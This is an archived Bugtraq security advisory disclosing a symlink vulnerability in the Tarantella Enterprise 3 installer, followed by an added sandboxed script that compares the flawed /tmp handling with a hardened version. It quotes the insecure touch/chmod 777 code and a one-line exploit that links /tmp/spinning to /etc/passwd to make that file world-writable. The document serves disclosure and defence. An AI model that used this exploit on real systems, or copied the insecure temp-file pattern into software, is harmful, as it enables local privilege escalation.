Bugtraq mailing list archives

Another local root vulnerability during installation of Tarantella Enterprise 3.


From: "Larry W. Cashdollar" <lwc () vapid dhs org>
Date: Tue, 19 Feb 2002 08:22:55 -0500 (EST)


                        Larry W. Cashdollar
                            Vapid Labs
                            2/18/2002


Another local root vulnerability during installation of Tarantella
Enterprise 3.


During installation a "twirling / \ | - " text graphic is displayed (you
remember them from the shareware games in DOS days..).  They create a file
in /tmp called spinning to determine what state the installation is at.
The file's permissions are changed to read write execute for all, and it is
removed and recreated during different stages of the installation.  It is
vulnerable to a simple symlink attack.

Problem Code:
<----snip---->
touch /tmp/spinning >/dev/null 2>&1
chmod 777 /tmp/spinning >/dev/null 2>&1
<----snip---->

Exploit:
There is no race condition here, just create the link.

[lwc@misery] ln -s /etc/passwd  /tmp/spinning

Wait until root is done installing...

[lwc@misery] ls -l /etc/passwd
-rwxrwxrwx    1 root     root         1094 Feb 18 22:39 /etc/passwd


Recommendations:
I again recommend the target system is running in single user mode before this
software is installed.


The vendor has been notified and plans to fix this in the next release.



http://vapid.dhs.org
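The touch/chmod pattern quoted in the advisory, set beside a hardened form, as an added example that is not part of the original post or the vendor's installer. It runs inside a throwaway sandbox directory that stands in for /tmp; the function names and the install.XXXXXX template are hypothetical.

```shell
#!/bin/sh
# Added example: runs only inside a throwaway sandbox that stands in for /tmp.

# Permission string of a path itself, e.g. "-rw-------".
mode_of() { ls -ld "$1" | cut -c1-10; }

# Pattern from the advisory, parameterised on the directory ($1 stands in
# for /tmp). touch and chmod both follow symlinks, so a link that already
# exists under the predictable name redirects the chmod to its target.
vulnerable_state_file() {
    touch "$1/spinning" >/dev/null 2>&1
    chmod 777 "$1/spinning" >/dev/null 2>&1
}

# Hardened form: mktemp -d atomically creates a private directory (mode 0700)
# with an unpredictable name; the state file lives inside it, owner-only.
# Nothing is ever created or chmod'ed under a predictable shared path.
hardened_state_file() {
    ( umask 077
      dir=$(mktemp -d "$1/install.XXXXXX") || exit 1
      : > "$dir/spinning" || exit 1
      printf '%s\n' "$dir/spinning" )
}

# Constructed scenario: a protected file (mode 600) and a pre-existing
# symlink named "spinning" that points at it.
demo() {
    sandbox=$(mktemp -d) || return 1
    : > "$sandbox/protected"
    chmod 600 "$sandbox/protected"
    ln -s "$sandbox/protected" "$sandbox/spinning"

    state=$(hardened_state_file "$sandbox") || return 1
    after_hardened=$(mode_of "$sandbox/protected")   # link never dereferenced
    state_mode=$(mode_of "$state")

    vulnerable_state_file "$sandbox"
    after_vulnerable=$(mode_of "$sandbox/protected") # chmod followed the link

    rm -rf "$sandbox"
    echo "$after_hardened $state_mode $after_vulnerable"
}

demo
```

The three fields printed are the protected file's mode after the hardened routine, the mode of the hardened state file, and the protected file's mode after the advisory's pattern has run.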

